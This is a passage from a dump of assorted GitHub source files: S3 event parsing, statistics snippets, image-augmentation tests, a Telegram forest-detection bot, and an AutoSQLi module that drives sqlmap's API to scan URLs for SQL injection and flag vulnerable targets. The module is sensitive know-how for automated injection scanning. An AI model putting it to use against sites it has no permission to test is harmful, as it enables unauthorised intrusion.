MissingEventFieldError(InvalidEventError):\n pass\n\n\nclass InvalidKeyFormat(InvalidEventError):\n pass\n\n\ndef loads(text):\n try:\n return json.loads(text)['Records'][0]\n except ValueError as e:\n raise InvalidEventDataError('Not a valid JSON') from e\n except KeyError as e:\n raise MissingEventFieldError(str(e)) from e\n except IndexError as e:\n raise InvalidEventDataError('Empty Records list') from e\n\n\ndef loads_s3_object_created_event(text):\n event = loads(text)\n try:\n if not event['eventName'].startswith('ObjectCreated:'):\n raise InvalidEventError()\n event['s3'] # checking that key exists\n obj = event['s3']['object']\n obj['key'] = urllib.parse.unquote(obj['key'])\n return event\n except KeyError as e:\n raise MissingEventFieldError(str(e))\n\n\ndef parse_unprocessed_file_key(key):\n\n key_pattern = r'^([^\\/\\s]+)\\/(([^\\/\\s]+)\\/)*([^\\/\\s]+)\\.(\\w+)$'\n # try to use legacy format, without upload hash\n match = re.match(key_pattern, key)\n if not match:\n raise InvalidKeyFormat('Key does not match expected format')\n\n submission_guid = match.group(1)\n try:\n filename = match.group(2)\n except ValueError as e:\n raise InvalidKeyFormat('Key does not match expected format') from e\n try:\n file_ext = match.group(3)\n except IndexError:\n file_ext = ''\n\n return submission_guid, filename, file_ext\n\n\ndef loads_s3_unprocessed_bucket_object_created_event(text):\n event = loads_s3_object_created_event(text)\n try:\n\n s3 = event['s3']\n bucket = s3['bucket']['name']\n key = s3['object']['key']\n\n if bucket != UNPROCESSED_BUCKET:\n raise InvalidEventError(\n 'Invalid bucket. Expected:{}. Got:{}.'.format(\n UNPROCESSED_BUCKET,\n bucket\n )\n )\n parse_unprocessed_file_key(key)\n return event\n except KeyError as e:\n raise MissingEventFieldError(str(e)) from e\n\n\ndef create_minimal_valid_file_put_event(\n key=None,\n etag=None,\n size=None,\n bucket=None,\n event_time=None,\n):\n event_json = {\n \"Records\": [\n {\n \"eventTime\": event_time.isoformat(),\n \"eventName\": \"ObjectCreated:Put\",\n \"s3\": {\n \"bucket\": {\n \"name\": bucket\n },\n \"object\": {\n \"key\": key,\n \"size\": size,\n \"eTag\": etag,\n }\n }\n }\n ]\n }\n return json.dumps(event_json)\n","repo_name":"hamlet-io/avscanner","sub_path":"src/processor/common/event/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39499584931","text":"# coding: utf-8\nfrom scipy.stats import norm\nnorm.pdf(0)\nnorm.pdf(0, loc=5, scale=10)\nimport numpy as np\nr = np.random.randn(10)\nnorm.pdf(r)\n# Joint probability vs. log of joint probability of data samples (+ fastrer than *)\n# Log of Gaussian PDF (much faster since no exponential!)\nnorm.logpdf(r)\nnorm.cdf(r)\nnorm.logcdf(r)\n","repo_name":"jwyx3/ML","sub_path":"numpy_stack/scipy_1.py","file_name":"scipy_1.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40996169115","text":"\"\"\"\nvalidar = list()\nval1 = val2 = 0\nvalidar = input('Digite a expressão: ').split(')')\nfor pos, num in enumerate(validar):\n if '(' in validar[pos]:\n val1 += validar[pos].count('(')\n if validar[pos] == '' or ')' not in validar[pos]:\n if '(' not in validar[pos]:\n val2 += 1\n if val2 > 0 and val1 == 0:\n val1 = 0\n break \nprint(f'Lista = {validar}')\nprint('Expressão Válida!' if val1 == val2 else 'Expressão Incorreta!')\n\"\"\"\n\n# Outra forma #\nexpr = str(input('Digite a expressão: '))\npilha = list()\nfor caract in expr:\n if caract == '(':\n pilha.append('(')\n elif caract == ')':\n if len(pilha) > 0:\n pilha.pop()\n else:\n pilha.append(')')\n break\nprint(f'Expressão válida!' if len(pilha) == 0 else 'Expressão incorreta!')","repo_name":"Lu1zReis/exercicios-Python","sub_path":"testes e exercícios/exercicios/script_083.py","file_name":"script_083.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21345361472","text":"import numpy as np\r\nimport update#习题1.10中的更新法\r\n\r\ntol=1e-3\r\n\r\ndata=np.random.random([5,3])\r\nA0=update.mean_and_SXY(data)#返回对A扫描1次的结果(2.7.2中的矩阵),等价于对A扫描了支点0的结果\r\n\r\ndef Sweep(A,k):\r\n '''单次扫描,支点为k'''\r\n #支点k的容差检查\r\n B=A.copy()\r\n if abs(A[k,k])np.sum((A[:,j]-np.mean(A[:,j]))**2)/tol:\r\n print('2: k=',k, 'is a colinear variate. Delete k')\r\n raise ValueError\r\n #通过以上的容差检查\r\n B[:,k]/=-A[k,k]#第k列\r\n for i in list(range(k))+list(range(k+1,len(A))):\r\n for j in list(range(k))+list(range(k+1,len(A))):#既不在第k行也不在第k列\r\n B[i,j]+=A[k,j]*B[i,k]\r\n B[k,]/=A[k,k]#第k行\r\n B[k,k]=1/A[k,k]\r\n return B\r\n\r\n\r\ndef Sweep_whole(A,list):\r\n '''如果A可逆,返回A^{-1}'''\r\n for i in list:\r\n try:\r\n A=Sweep(A,i)\r\n print('i=',i,'RSS=',A[-1,-1])\r\n except ValueError:\r\n print('A is not invertible.')\r\n break\r\n return A\r\n\r\ndef MyLinearRegression(data):\r\n A0=update.mean_and_SXY(data)\r\n Result=Sweep_whole(A0,range(1,len(A0)-1))\r\n print('全扫描结果:',Result)\r\n beta=-Result[-1,:-1]\r\n MSE=Result[-1,-1]/(len(data)-len(A0)+1)\r\n R_squared=1-Result[-1,-1]/A0[-1,-1]\r\n se_beta=Result.diagonal()[:-1]\r\n return dict([('beta',beta),('MSE',MSE),('R-squared',R_squared),('se(beta)',se_beta)])\r\n\r\n\r\n\r\n\r\n#2.7.4和2.7.5的证明见作业\r\n#2.7.6\r\nprint('验证逆:',Sweep_whole(A0,range(len(A0))).dot(A0))#应为单位矩阵\r\n\r\nfrom sklearn import linear_model#验证与标准库算出的结果相同\r\nlm=linear_model.LinearRegression()\r\nlm.fit(data[:,:-1].reshape([-1,data.shape[1]-1]),data[:,-1])\r\nprint('标准库结果:',lm.intercept_,lm.coef_,lm._residues)\r\n#print('全扫描结果:',Sweep_whole(A0,range(1,len(A0)-1)))\r\nprint('全扫描结果:',MyLinearRegression(data))\r\n\r\n\r\n\r\n","repo_name":"KillingVectorField/Homework-of-Regression-Analysis","sub_path":"HW1/Sweep.py","file_name":"Sweep.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40480714135","text":"# From AutoSQLi\n# Most parts of this file were taken from here:\n# https://github.com/Ekultek/Zeus-Scanner/blob/master/lib/attacks/sqlmap_scan/__init__.py\n# Thanks to Ekultek (https://github.com/Ekultek) !\n\nimport json\nimport re\nimport requests\nimport psutil\nimport time\nfrom multiprocessing import Process\n\nfrom autosqli.execute import execute\nfrom autosqli import log\n\n\ndef sqlmapapi_launch():\n \"\"\" launches sqlmapapi in another process and make sure it launched \"\"\"\n\n def background():\n sta = execute(['python2.7', 'sqlmapapi.py', '-s'], 'sqlmap/', None,\n None)\n\n if 'Address already in use' in sta:\n log.critical('sqlmapapi.py said: {}'.format(sta))\n\n if 'bash' in sta:\n log.critical('bash error: {}'.format(sta))\n\n p = Process(target=background)\n p.start()\n\n time.sleep(5)\n\n if not is_sqlmapapi_launched:\n log.critical(\"sqlmapapi.py couldn't be launched\")\n\n\ndef is_sqlmapapi_launched():\n \"\"\" return True if sqlmapapi is launched, otherwise False \"\"\"\n launched = False\n launched = 'sqlmapapi.py' in str({p.pid: p.info for p in\n psutil.process_iter(attrs=['cmdline'])})\n\n return launched\n\n\ndef sqlmapapi_check():\n \"\"\" verify if sqlmapi is launched, if not launch it \"\"\"\n log.info(\"Checking if sqlmapapi is already launched\")\n\n if not is_sqlmapapi_launched():\n log.info(\"Launching sqlmapapi\")\n sqlmapapi_launch()\n\n\ndef sqlmap_url(url, options):\n \"\"\" return sqlmap results for a specific url and specified options \"\"\"\n \"\"\" if there was an error, return None \"\"\"\n # check if sqlmapapi is available\n sqlmapapi_check()\n\n # create the new api interface\n sqlmap = SqlmapHook(url)\n\n # init a new scan ( create it, but don't launch it )\n sqlmap.init_new_scan()\n\n scan_id = sqlmap.get_scan_id()\n log.debug(\"Launching a sqlmap scan for {} (id: {})\".format(url, scan_id))\n log.debug(\"Options for {}: {}\".format(url, options))\n sqlmap.start_scan(scan_id, options)\n\n while True:\n time.sleep(1)\n logs, running = sqlmap.show_sqlmap_log(scan_id)\n\n if not running:\n return logs\n\n time.sleep(4)\n\n\ndef parse_report(report, target):\n \"\"\" add sqlmap report details to a given target \"\"\"\n log.debug(\"report: {}\".format(report))\n if 'CRITICAL' in report:\n if 'all tested parameters do not appear to be injectable.' in report:\n # The detection process was error-free but didn't found a SQLi\n target.set_vulnerability_status(False)\n else:\n # There was an error that we are too lazy to handle\n target.set_vulnerability_status(False)\n target.set_sqlmap_error(True)\n else:\n log.critical(\"not finished yetttt :(\")\n print('report:\\n\\n{}'.format(report))\n exit(69)\n\n target.set_sqlmap_logs(report)\n return target\n\n\ndef sqlmap_target(target, options):\n \"\"\" add sqlmap details to a Target and return it \"\"\"\n report = sqlmap_url(target.getUrl(), options)\n if report is None:\n log.critical(\"There was an error while scanning {}\".format(target.url))\n exit(1) # just to be sure\n\n target = parse_report(report, target)\n # TODO: finish this :)\n return target\n\n\nclass SqlmapHook(object):\n\n \"\"\"\n Sqlmap API hook, will process API requests, and output API data\n \"\"\"\n\n def __init__(self, to_scan, port=None, api_con=\"http://127.0.0.1:{}\",\n default_port=8775):\n self.to_scan = to_scan\n self.port = port or default_port\n self.headers = {\"Content-Type\": \"application/json\"}\n self.connection = api_con.format(self.port)\n self.commands = {\n \"init\": \"/task/new\",\n \"id\": \"/admin/0/list\",\n \"start\": \"/scan/{}/start\",\n \"status\": \"/scan/{}/status\",\n \"log\": \"/scan/{}/log\"\n }\n\n def init_new_scan(self):\n \"\"\"\n create a new API scan\n \"\"\"\n new_scan_url = \"{}{}\".format(self.connection, self.commands[\"init\"])\n try:\n results = requests.get(new_scan_url, params=self.headers)\n return results\n except Exception as e:\n log.critical(\"An error happenned in init_new_scan: {}\".format(e))\n return None\n\n def get_scan_id(self, split_by=16):\n \"\"\"\n get the ID of the current API scan\n \"\"\"\n # current_scan_id = None\n id_re = re.compile(r\"[a-fA-F0-9]{16}\")\n api_id_url = \"{}{}\".format(self.connection, self.commands[\"id\"])\n req = requests.get(api_id_url)\n to_check = str(json.loads(req.content)[\"tasks\"]).lower()\n return ''.join(id_re.findall(to_check))\n\n def start_scan(self, api_id, opts=None):\n \"\"\"\n start the API scan\n \"\"\"\n start_scan_url = \"{}{}\".format(\n self.connection,\n self.commands[\"start\"].format(api_id)\n )\n data_dict = {\"url\": self.to_scan}\n if opts is not None:\n for i in range(0, len(opts)):\n data_dict[opts[i][0]] = opts[i][1]\n post_data = json.dumps(data_dict)\n\n requests.post(\n start_scan_url,\n data=post_data,\n headers=self.headers\n )\n\n def show_sqlmap_log(self, api_id):\n \"\"\"show the sqlmap log\n return a tuple like this: (logs, is_running)\n \"\"\"\n\n running_status_url = \"{}{}\".format(\n self.connection,\n self.commands[\"status\"].format(api_id)\n )\n\n running_log_url = \"{}{}\".format(\n self.connection,\n self.commands[\"log\"].format(api_id)\n )\n\n status_req = requests.get(running_status_url)\n status_json = json.loads(status_req.content)\n current_status = status_json[\"status\"]\n\n is_running = True\n logs = ''\n\n if current_status != \"running\":\n log.debug(\"[scan: {}] scan isn't running: {}\".\n format(api_id, current_status))\n is_running = False\n\n current_status = json.loads(\n requests.get(running_status_url).content\n )[\"status\"]\n\n log_req = requests.get(running_log_url)\n log_json = json.loads(log_req.content)\n\n for i in range(0, len(log_json[\"log\"])):\n logs += log_json[\"log\"][i][\"message\"]\n\n return (logs, is_running)\n","repo_name":"clouedoc/AutoSQLi","sub_path":"autosqli/sqlmap_interface.py","file_name":"sqlmap_interface.py","file_ext":"py","file_size_in_byte":6427,"program_lang":"python","lang":"en","doc_type":"code","stars":258,"dataset":"github-code","pt":"61"} +{"seq_id":"41360887518","text":"import os\nimport tempfile\nimport unittest\nfrom typing import Any, Callable, Dict, List, Optional\n\nimport numpy as np\nfrom augly.tests import ImageAugConfig\nfrom augly.utils import pathmgr, TEST_URI\nfrom PIL import Image\n\n\ndef are_equal_images(a: Image.Image, b: Image.Image) -> bool:\n return a.size == b.size and np.allclose(np.array(a), np.array(b))\n\n\ndef are_equal_metadata(\n actual_meta: List[Dict[str, Any]],\n expected_meta: List[Dict[str, Any]],\n exclude_keys: Optional[List[str]],\n) -> bool:\n if actual_meta == expected_meta:\n return True\n\n for actual_dict, expected_dict in zip(actual_meta, expected_meta):\n for (act_k, act_v), (exp_k, exp_v) in zip(\n sorted(actual_dict.items(), key=lambda kv: kv[0]),\n sorted(expected_dict.items(), key=lambda kv: kv[0]),\n ):\n if exclude_keys is not None and act_k in exclude_keys:\n continue\n\n if act_k != exp_k:\n return False\n\n if act_v == exp_v:\n continue\n\n # Bboxes are tuples but stored as lists in expected metadata\n if (\n isinstance(act_v, list)\n and all(isinstance(x, tuple) for x in zip(act_v, exp_v))\n and len(act_v) == len(exp_v)\n and all(list(x) == y for x, y in zip(act_v, exp_v))\n ):\n continue\n\n \"\"\"\n Allow relative paths in expected metadata: just check that the end of the\n actual path matches the expected path\n \"\"\"\n if not (\n isinstance(act_v, str)\n and isinstance(exp_v, str)\n and act_v[-len(exp_v) :] == exp_v\n ):\n return False\n\n return True\n\n\nclass BaseImageUnitTest(unittest.TestCase):\n ref_img_dir = os.path.join(TEST_URI, \"image\", \"dfdc_expected_output\")\n\n def test_import(self) -> None:\n try:\n from augly import image as imaugs\n except ImportError:\n self.fail(\"imaugs failed to import\")\n self.assertTrue(dir(imaugs), \"Image directory does not exist\")\n\n @classmethod\n def setUpClass(cls):\n cls.maxDiff = None\n cls.config = ImageAugConfig(input_file_index=0)\n\n img_path, img_file = cls.config.get_input_path()\n cls.local_img_path = pathmgr.get_local_path(img_path)\n cls.img = Image.open(cls.local_img_path)\n\n def evaluate_function(self, aug_function: Callable[..., Image.Image], **kwargs):\n ref = self.get_ref_image(aug_function.__name__)\n\n with tempfile.NamedTemporaryFile(suffix=\".png\") as tmpfile:\n aug_function(self.local_img_path, output_path=tmpfile.name, **kwargs)\n file_dst = Image.open(tmpfile.name)\n\n pil_dst = aug_function(self.img, **kwargs)\n\n self.assertTrue(\n are_equal_images(pil_dst, ref), \"Expected and outputted images do not match\"\n )\n self.assertTrue(\n are_equal_images(file_dst, ref),\n \"Expected and outputted images do not match\",\n )\n\n def evaluate_class(\n self,\n transform_class: Callable[..., Image.Image],\n fname: str,\n metadata_exclude_keys: Optional[List[str]] = None,\n check_mode: bool = True,\n ):\n metadata = []\n bboxes, bbox_format = [(0.5, 0.5, 0.25, 0.75)], \"yolo\"\n ref = self.get_ref_image(fname)\n dst = transform_class(\n self.img, metadata=metadata, bboxes=bboxes, bbox_format=bbox_format\n )\n\n if check_mode:\n self.assertTrue(\n self.img.mode == dst.mode,\n \"Expected and outputted image modes do not match\",\n )\n\n self.assertTrue(\n are_equal_metadata(metadata, self.metadata[fname], metadata_exclude_keys),\n \"Expected and outputted metadata do not match\",\n )\n self.assertTrue(\n are_equal_images(dst, ref), \"Expected and outputted images do not match\"\n )\n\n def get_ref_image(self, fname: str) -> Image.Image:\n ref_img_name = f\"test_{fname}.png\"\n ref_local_path = pathmgr.get_local_path(\n os.path.join(self.ref_img_dir, ref_img_name)\n )\n return Image.open(ref_local_path)\n","repo_name":"facebookresearch/AugLy","sub_path":"augly/tests/image_tests/base_unit_test.py","file_name":"base_unit_test.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","stars":4836,"dataset":"github-code","pt":"61"} +{"seq_id":"24059412761","text":"import urllib.request\nfrom forestbot.ml_backend.controller import Controller, Artifact\nfrom forestbot.front.image_analyzer.size_analyzer import is_correct_size\nfrom forestbot.satellite.satellite_data import download_rect\nfrom forestbot.satellite.osm_convert import generate_osm\nfrom forestbot.front.utils import *\nfrom threading import Thread, Lock\nfrom pathlib import Path\nimport telebot\nimport numpy as np\nimport configparser\nimport xml.etree.ElementTree as ET\nimport os\n\n\nclass ForestBot:\n \"\"\"\n Entity for interaction with Telegram users and their messages.\n \"\"\"\n max_attempts = 10 # Max number of attempts to send the result\n model_input_size = 224\n use_crop = True\n crop_size = 224\n default_radius_deg = convert_km_to_deg(2.0)\n max_radius_km = 7.0\n min_radius_km = 1.0\n default_threshold = 0.2\n out_date_time = 60 * 10 # in seconds\n min_photo_size = 200\n max_photo_size = 2000\n valid_formats = ['png', 'jpeg', 'jpg', 'bmp']\n min_download_size_to_notify = 5\n\n def __init__(self):\n config = configparser.ConfigParser()\n config.read(Path(\"credentials.ini\"))\n\n token = config['BOT']['bot_token']\n # TODO: save + load from save. make static?\n self.user_radiuses_deg = dict()\n self.user_thresholds = dict()\n self.bot = telebot.TeleBot(token)\n self.__init_messages()\n self.__add_handlers()\n self.controller = Controller(\n callback=self.__send_prediction_callback,\n model_input_size=ForestBot.model_input_size,\n use_crop=ForestBot.use_crop,\n crop_size=ForestBot.crop_size if ForestBot.use_crop else None\n )\n self.download_satellite_lock = Lock()\n self.download_satellite_queue_size = 0\n\n self.img_to_mask = dict()\n self.img_to_func = dict()\n\n Thread(target=self.controller.observe_updates).start()\n print(\"Bot is running\")\n\n def start(self) -> None:\n \"\"\"Start the bot. Thread will be captured\"\"\"\n self.bot.polling(none_stop=True)\n\n def __add_handlers(self) -> None:\n \"\"\"Method for initialize message handlers from Telegram bot\"\"\"\n\n @self.bot.message_handler(commands=['set_sensitivity'])\n def handle_threshold(message) -> None:\n words = message.text.split(' ')\n if len(words) != 2 or not is_float(words[1]) or not 0 < float(words[1]) < 1:\n self.send_text_message(chat_id=message.chat.id, text=self.wrong_threshold)\n else:\n # higher sensitivity => lower threshold\n new_threshold = 1 - float(words[1])\n self.user_thresholds[message.chat.id] = new_threshold\n self.send_text_message(message.chat.id, f\"Установлена новая чувствительность: {1 - new_threshold:.2f}\")\n\n @self.bot.message_handler(commands=['start'])\n def handle_start_message(message) -> None:\n self.send_text_message(message.chat.id, self.start_message)\n\n @self.bot.message_handler(commands=['help'])\n def handle_help_message(message) -> None:\n self.send_text_message(message.chat.id, self.help_message)\n\n @self.bot.message_handler(commands=['set_radius'])\n def handle_change_radius_message(message) -> None:\n\n success, custom_radius = get_radius_from_msg(\n message=message.text, min_value=ForestBot.min_radius_km, max_value=ForestBot.max_radius_km)\n\n if not success:\n self.send_text_message(message.chat.id, self.wrong_change_radius_message)\n else:\n self.user_radiuses_deg[message.chat.id] = convert_km_to_deg(custom_radius)\n self.send_text_message(message.chat.id,\n f\"Радиус снимка успешно установлен: {round(custom_radius, 2)} км\")\n\n @self.bot.message_handler(\n content_types=['audio', 'sticker', 'video', 'video_note', 'voice', 'contact', 'web_app_data'])\n def handle_other_types(message) -> None:\n self.send_text_message(message.chat.id, self.wrong_file_format_message)\n\n @self.bot.message_handler(content_types=['document'])\n @self.bot.message_handler(content_types=['photo'])\n def handle_photo_message(message) -> None:\n # Here we take only last image from the assumption that the user has sent only one picture\n # TODO: add processing of several photos in one message\n # TODO: move validation to another method\n if message.content_type == 'photo':\n file_id = message.photo[-1].file_id\n file_format = \"png\"\n\n else: # document\n file_id = message.document.file_id\n file_format = message.document.mime_type.split('/')[1]\n if not ForestBot.is_correct_format(file_format):\n self.send_text_message(message.chat.id, self.wrong_file_format_message)\n return\n\n file_info = self.bot.get_file(file_id)\n file_url = f'https://api.telegram.org/file/bot{self.bot.token}/{file_info.file_path}'\n\n if not is_correct_size(url=file_url, max_size=ForestBot.max_photo_size, min_size=ForestBot.min_photo_size):\n self.send_text_message(message.chat.id, self.wrong_size_message)\n return\n\n self.send_text_message(message.chat.id, self.accept_photo_message)\n image_name = generate_image_name(chat_id=message.chat.id, file_format=file_format)\n urllib.request.urlretrieve(file_url, f\"input_photos/{image_name}\")\n chat_id = message.chat.id\n\n # A pair of image and id is added to the processing queue\n self.controller.request_queue.put(\n Artifact(chat_id, image_name, self.user_thresholds.get(chat_id, self.default_threshold)))\n\n @self.bot.message_handler(content_types=['text'])\n def handle_text_cords_message(message) -> None:\n success, cords = get_cords_from_msg(message.text)\n if not success:\n self.send_text_message(message.chat.id, self.wrong_cords_message)\n else:\n self.__handle_cords_input(chat_id=message.chat.id, cords=cords)\n\n @self.bot.message_handler(content_types=['location'])\n def handle_location_message(message) -> None:\n self.__handle_cords_input(chat_id=message.chat.id,\n cords=(message.location.latitude, message.location.longitude))\n\n @self.bot.callback_query_handler(func=is_osm_call)\n def callback_for_osm(call):\n chat_id = call.from_user.id\n msg_id = call.message.message_id\n date = call.message.date\n\n if time.time() - date > ForestBot.out_date_time:\n self.bot.answer_callback_query(call.id, 'Сообщение устарело ⌛')\n self.send_text_message(chat_id, 'Похоже, прошло слишком много времени 😱\\n'\n 'Отправьте ваши координаты снова, а мы их обработаем 🚀')\n\n img_name = call.data.split()[1]\n mask = self.img_to_mask[img_name]\n func = self.img_to_func[img_name]\n\n self.bot.answer_callback_query(call.id, 'Принято 👍')\n self.bot.edit_message_reply_markup(chat_id=chat_id, message_id=msg_id, reply_markup=None)\n self.send_text_message(chat_id, \"Экспортируем результат в формат OSM...\")\n\n Thread(target=__send_osm, args=[chat_id, mask, func]).start()\n\n def __send_osm(chat_id, mask, func) -> None:\n \"\"\"\n Method to generate and send .osm file to user.\n :param chat_id: user id\n :param mask: predicted mask\n :param func: function for converting coordinates\n \"\"\"\n\n def send_document(chat_id, document):\n Thread(target=send_document_with_retry, kwargs={\n 'bot': self.bot,\n 'chat_id': chat_id,\n 'document': document,\n 'max_attempts': ForestBot.max_attempts\n }).start()\n\n file_name = f\"{round(time.time() * 100000)}.osm\"\n file_path = Path(f'osm/{file_name}')\n result = generate_osm(mask, func)\n\n with open(file_path, 'w') as f:\n ET.ElementTree(result).write(f, encoding='unicode', xml_declaration=True)\n\n f = open(file_path, 'rb')\n send_document(chat_id=chat_id, document=f)\n\n @self.bot.callback_query_handler(func=is_processing_call)\n def callback_for_processing_choice(call):\n msg_id = call.message.message_id\n chat_id = call.from_user.id\n answer, image_name = call.data.split()\n date = call.message.date\n\n self.bot.edit_message_reply_markup(chat_id=chat_id, message_id=msg_id, reply_markup=None)\n\n if answer == 'y':\n if time.time() - date > ForestBot.out_date_time:\n self.bot.answer_callback_query(call.id, 'Сообщение устарело ⌛')\n self.send_text_message(chat_id, 'Похоже, прошло слишком много времени 😱\\n'\n 'Отправьте ваши координаты снова, а мы их обработаем 🚀')\n else:\n self.bot.answer_callback_query(call.id, 'Принято 👍')\n self.send_text_message(chat_id, 'Начинаем поиск 🔍')\n self.controller.request_queue.put(\n Artifact(chat_id, image_name, self.user_thresholds.get(chat_id, self.default_threshold)))\n else:\n self.bot.answer_callback_query(call.id, 'Отмена 🚫')\n self.send_text_message(chat_id, 'Поиск отменен. Хотите изучить другую местность ?🤗'\n '\\nПросто отправьте координаты или снимок!')\n\n def __handle_cords_input(self, chat_id, cords) -> None:\n \"\"\"\n Method to process coordinates\n :param chat_id: user id\n :param cords: extracted coordinates from geoteg or text message\n \"\"\"\n Thread(target=self.__send_loading_animation_message, kwargs={'chat_id': chat_id}).start()\n image_name = generate_image_name(chat_id)\n radius = self.user_radiuses_deg.get(chat_id, ForestBot.default_radius_deg)\n self.download_satellite_queue_size += 1\n Thread(\n target=self.__download_satellite,\n kwargs={\n 'image_name': image_name,\n 'cords': cords,\n 'radius': radius,\n 'download_dir': Path(\"input_photos\"),\n 'chat_id': chat_id\n }\n ).start()\n\n def __send_loading_animation_message(self, chat_id: int) -> None:\n \"\"\"\n Method to show cool rotating globe in message\n :param chat_id: user id\n \"\"\"\n states = ['🌍', '🌎', '🌏']\n message_text = \"Ваши координаты приняты. Загружаем снимок \"\n msg = self.bot.send_message(chat_id, message_text + states[0])\n if self.download_satellite_queue_size > ForestBot.min_download_size_to_notify:\n self.send_text_message(chat_id,\n f\"В данный момент нам поступило достаточно много запросов на загрузку снимков.\\n\"\n f\"Номер вашего запроса в очереди: {self.download_satellite_queue_size}\")\n for i in range(1, 124):\n try:\n self.bot.edit_message_text(message_text + states[i % 3], chat_id, msg.id)\n except Exception as e:\n time.sleep(3)\n time.sleep(0.5)\n\n def __download_satellite(self, image_name, cords, radius, download_dir, chat_id) -> None:\n \"\"\"\n Method to download satellite image on disk.\n \"\"\"\n with self.download_satellite_lock:\n try:\n transform_func = download_rect(image_name=image_name, center=cords, radius=radius,\n download_dir=download_dir)\n self.img_to_func[image_name] = transform_func\n self.__send_image_with_retry(\n result_path=download_dir / image_name,\n chat_id=chat_id,\n delete_result=False,\n caption=f'Снимок местности по вашим координатам:\\n{cords[0]}, {cords[1]}\\n',\n reply_markup=generate_buttons_continue(image_name)\n )\n except Exception as ex:\n print(f\"Failed to load satellite images:\\n{ex}\")\n self.send_text_message(chat_id, \"Не удалось обнаружить спутниковые снимки в данном районе. Похоже, \"\n \"Вы - отважный путешественник, раз решили отправиться туда!\")\n finally:\n self.download_satellite_queue_size -= 1\n\n def __init_messages(self) -> None:\n \"\"\"Loads basic messages from files.\"\"\"\n msg_path = Path(\"forestbot/front/messages\")\n\n with open(msg_path / \"start_message.txt\", encoding=\"UTF-8\") as f:\n self.start_message = f.read()\n\n with open(msg_path / \"accept_photo_message.txt\", encoding=\"UTF-8\") as f:\n self.accept_photo_message = f.read()\n\n with open(msg_path / \"ready_img_message.txt\", encoding=\"UTF-8\") as f:\n self.ready_img_message = f.read()\n\n with open(msg_path / \"failed_to_send_img_message.txt\", encoding=\"UTF-8\") as f:\n self.failed_to_send_message = f.read()\n\n with open(msg_path / \"wrong_cords_message.txt\", encoding=\"UTF-8\") as f:\n self.wrong_cords_message = f.read()\n\n with open(msg_path / \"wrong_file_format_message.txt\", encoding=\"UTF-8\") as f:\n self.wrong_file_format_message = f.read()\n\n with open(msg_path / \"wrong_size_message.txt\", encoding=\"UTF-8\") as f:\n self.wrong_size_message = f.read()\n\n with open(msg_path / \"help_message.txt\", encoding=\"UTF-8\") as f:\n self.help_message = f.read()\n\n with open(msg_path / \"wrong_threshold.txt\", encoding=\"UTF-8\") as f:\n self.wrong_threshold = f.read()\n\n self.wrong_change_radius_message = \"Для изменения радиуса снимка используйте команду таким образом:\\n\" \\\n \"/set_radius \" \\\n f\"{{число в пределах \" \\\n f\"[{ForestBot.min_radius_km}, {ForestBot.max_radius_km}]}}\\n\\n\" \\\n \"Пример:\\n/set_radius 2.5\"\n\n def __send_prediction_callback(self, result_path: Path, chat_id: int, mask: np.ndarray, image_name=None) -> None:\n \"\"\"\n Callback for completed prediction.\n :param Path result_path: path to the result image\n :param int chat_id: chat id\n \"\"\"\n self.img_to_mask[image_name] = mask\n Thread(\n target=self.__send_image_with_retry,\n kwargs={\n 'result_path': result_path,\n 'chat_id': chat_id,\n 'delete_result': True,\n 'reply_markup': generate_buttons_osm(image_name) if image_name in self.img_to_func else None\n }\n ).start()\n\n def __send_image_with_retry(self, result_path: Path, chat_id: int, attempt: int = 0, caption: str = \"Готово!🥳\",\n delete_result: bool = False, **kwargs) -> None:\n \"\"\"\n Method for sending the processed image. Applies multiple retries on failed submission.\n :param Path result_path: path to the image\n :param int chat_id: chat id\n :param int attempt: attempt number (starts from 0)\n :param str caption: (optional) text message\n \"\"\"\n try:\n # Try to read and send result\n with open(result_path, 'rb') as result:\n self.bot.send_photo(chat_id=chat_id, photo=result, caption=caption, **kwargs)\n if delete_result:\n try:\n os.remove(result_path)\n os.remove(Path('input_photos') / result_path.name)\n except Exception as e:\n print(e)\n except Exception as exception:\n print(\n f\"Attempt {attempt}/{ForestBot.max_attempts} failed. Trying again...\\n\"\n f\"Chat id = {chat_id},\\npath={result_path}\\n{exception}\\n\\n\"\n )\n\n if attempt < ForestBot.max_attempts:\n # Do another attempt with delay\n time.sleep(1)\n self.__send_image_with_retry(result_path=result_path, chat_id=chat_id, attempt=attempt + 1,\n caption=caption, **kwargs)\n else:\n # Maximum number of attempts made. Ask user to retry\n print('=' * 10, f\"\\nFailed to send\\nchat_id = {chat_id}\\nimg = {result_path}\\n\", '=' * 10, sep='')\n try:\n os.remove(result_path)\n except Exception as e:\n print(e)\n try:\n # Try to ask user for retry if it is possible\n self.send_text_message(chat_id, self.failed_to_send_message)\n except Exception as exception:\n print('=' * 10, f\"\\nLost connection with chat id = {chat_id}\\n{exception}\\n\", '=' * 10, sep='')\n else:\n if attempt:\n print(\n f\"!!!\\nSuccessfully send by {attempt}th attempt.\\nChat id = {chat_id}, img = {result_path}\\n!!!\\n\")\n\n def send_text_message(self, chat_id: int, text: str) -> None:\n Thread(target=send_text_message_with_retry, kwargs={\n 'bot': self.bot, 'chat_id': chat_id, 'text': text, 'max_attempts': ForestBot.max_attempts\n }).start()\n\n @classmethod\n def is_image_size_correct(cls, photo) -> bool:\n return (cls.min_photo_size <= photo[-1].width <= cls.max_photo_size) and (\n cls.min_photo_size <= photo[-1].height <= cls.max_photo_size)\n\n @classmethod\n def is_correct_format(cls, file_format: str) -> bool:\n return file_format in cls.valid_formats\n","repo_name":"WinstonDovlatov/ForestBot","sub_path":"forestbot/front/forest_bot.py","file_name":"forest_bot.py","file_ext":"py","file_size_in_byte":19041,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"817527562","text":"import cv2 as cv\nfrom src.algorithms.BaseKeypointAlgorithm import BaseKeypointAlgorithm\nfrom timeit import default_timer as timer\n\nclass SIFT(BaseKeypointAlgorithm):\n def 